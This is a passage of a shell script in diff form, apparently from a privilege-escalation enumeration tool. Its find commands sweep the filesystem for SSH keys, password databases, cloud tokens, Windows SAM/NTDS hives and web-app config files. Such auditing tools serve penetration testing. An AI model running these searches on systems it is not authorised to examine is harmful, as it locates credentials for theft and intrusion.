\"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"sess_*\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/lib|^/system|^/snap|^/mnt|^$GREPHOMESEARCH|^/var|^/opt|^/bin|^/lib32|^/sys|^/usr|^/private|^/srv|^/systemd|^/tmp|^/lib64|^/cdrom|^/.cache|^/sbin|^/etc|^/run|^/applications|^/media" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/lib|^/system|^/snap|^/mnt|^$GREPHOMESEARCH|^/var|^/opt|^/bin|^/lib32|^/sys|^/usr|^/private|^/srv|^/systemd|^/tmp|^/lib64|^/cdrom|^/.cache|^/sbin|^/etc|^/run|^/applications|^/media" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/lib|^/system|^/snap|^/mnt|^$GREPHOMESEARCH|^/var|^/opt|^/bin|^/lib32|^/sys|^/usr|^/private|^/srv|^/systemd|^/tmp|^/lib64|^/cdrom|^/.cache|^/sbin|^/etc|^/run|^/applications|^/media" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "mysql$|debian\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) - PSTORAGE_APACHE=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "sites-enabled$|000-default\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/var|^/mnt|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E '/default/settings.php' | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E 'moodle/config.php' | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - PSTORAGE_MONGO=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_ETC\n$FIND_DIR_BIN\n$FIND_DIR_VAR\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_USR\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_CACHE\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_OPENVPN=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) - PSTORAGE_SSH=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/bin|^/tmp|^/srv|^/mnt|^/cdrom|^/.cache|^/sbin|^/usr|^/etc|^$GREPHOMESEARCH|^/var|^/applications|^/private|^/media|^/opt|^/snap" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_BIN\n$FIND_APPLICATIONS\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SRV\n$FIND_SNAP\n$FIND_CACHE\n$FIND_TMP\n$FIND_RUN\n$FIND_CDROM\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_OPT\n$FIND_ETC\n$FIND_LIB64\n$FIND_SYSTEM\n$FIND_SYS\n$FIND_LIB\n$FIND_USR\n$FIND_MEDIA\n$FIND_MNT\n$FIND_PRIVATE" | grep -E "^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e 